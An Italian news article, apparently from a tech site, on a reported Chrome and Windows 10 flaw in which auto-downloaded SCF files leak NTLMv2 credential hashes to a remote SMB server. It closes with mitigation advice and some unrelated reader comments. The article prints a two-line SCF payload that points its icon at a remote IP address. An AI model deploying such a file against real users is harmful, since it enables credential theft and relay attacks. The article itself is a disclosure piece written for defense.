Chrome, un bug per rubare credenziali Windows

Il famoso browser di Google contiene un bug che se sfruttato potrebbe consentire agli hacker di rubare le credenziali di autenticazione della vittima e lanciare attacchi di tipo SMB Relay

Gli attacchi che coinvolgono il protocollo SMB su Windows sono un problema costante e gli exploit finora conosciuti sono innumerevoli. Recentemente un security engineer di DefenseCode, Bosko Stakanovic ha scoperto una vulnerabilità dovuta alla configurazione di default di Google Chrome e al comportamento di Windows 10 nel trattamento dei file SCF .

chromebug

Con questa configurazione di default il browser scarica automaticamente i file che ritiene sicuri senza interrogare l’utente sulla locazione in cui verrà effettuato il download, ma usando la cartella presente di default.

L’estensione SCF ( Windows Explorer Shell Command ) è utilizzata dai tempi di Windows 98 per creare dei file speciali con icona personalizzata in grado di richiamare funzionalità di sistema, come ad esempio il collegamento “Mostra Desktop”.

Come spiegato da Stakanovich una volta che l’utente viene portato a cliccare su un link malevolo questo innesca un download automatico di un file di tipo SCF, che induce Windows ad effettuare un tentativo di autenticazione a un server SMB remoto . Il file malevolo può contenere anche solo due righe, come nell’esempio seguente:

[Shell]
IconFile=\\170.170.170.170\icon

L’SCF, una volta scaricato, rimane dormiente finché la vittima non apre la cartella “Download”, dopodiché, senza bisogno che l’utente clicchi sul file scaricato Windows, tenterà automaticamente di raggiungere “l’icona” specificata, presentando le sue credenziali al server remoto.
Ciò fornisce all’attaccante l’username della vittima e l’hash NTLMv2 delle password , che potranno essere utilizzati offline per il cracking o per accedere direttamente ad altri servizi che accettano lo stesso tipo di autenticazione.

Stakanovich sostiene che questo attacco può essere usato anche per perpetrare attacchi di tipo SMB relay : le organizzazioni che permettono accesso remoto a servizi come Microsoft Exchange e usano NTLM come metodo di autenticazione potrebbero essere vulnerabili, permettendo all’hacker di accedere ai dati senza dover rompere la password.

Questi tipi di attacchi permettono a utenti malevoli di impersonare altri soggetti , perciò sono un problema anche per le grandi aziende; le credenziali rubate possono essere utilizzate in tempi successivi al loro furto per eseguire privilege escalation al fine di prendere il controllo delle risorse IT. Per gli utenti di Windows 8/10 che usano un account Microsoft, invece che l’account locale, avranno impatto anche su tutti i servizi Microsoft collegati (Outlook.com, Office360 ecc.).

Al momento, Chrome sta lavorando a un fix . Nel frattempo, per proteggersi dagli impatti della vulnerabilità, si raccomanda di disabilitare il salvataggio automatico dei file in Chrome andando nel menu Impostazioni/Mostra impostazioni avanzate e selezionando l’opzione Richiedi dove salvare ogni file prima di scaricare. Inoltre, è consigliabile limitare il traffico SMB alle reti private, configurando il firewall di modo da bloccare le porte 137, 138, 139 e 445 verso la rete Internet.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • glimpse scrive:
    oggi e domani
    Ma non era Signal "La popolare app di messaggistica sicura" ?Come cambiano le cose, a seconda della convenienza, nel mondo dei giornalari.
  • bye scrive:
    è meglio di what app
    è meglio di what app ... e non appartiene a Facebook (NSA)
    • Fai il login o Registrati scrive:
      Re: è meglio di what app
      Mi piacerebbe anche usarla, ma dei miei contatti non la usa nessuno, quindi...- Scritto da: bye
      è meglio di what app ... e non appartiene a
      Facebook
      (NSA)
      • Il Fuddaro scrive:
        Re: è meglio di what app
        - Scritto da: Fai il login o Registrati
        Mi piacerebbe anche usarla, ma dei miei contatti
        non la usa nessuno,
        quindi...

        - Scritto da: bye

        è meglio di what app ... e non appartiene a

        Facebook

        (NSA)Se i tuoi 'contatti' decidessero tutti quanti di saltare nel fosso, giusto perché sono i tuoi contatti, salteresti pure tu no.
      • FasoTutoMiD ioCan scrive:
        Re: è meglio di what app
        - Scritto da: Fai il login o Registrati
        Mi piacerebbe anche usarla, ma dei miei contatti
        non la usa nessuno,
        quindi...Risposta automatica ad ogni messaggio su Whatsapp:-- Da adesso mi trovi su Telegram (link a Telegram) --Risolto :DE non è nemmeno difficile da pensare eh ... @^
Chiudi i commenti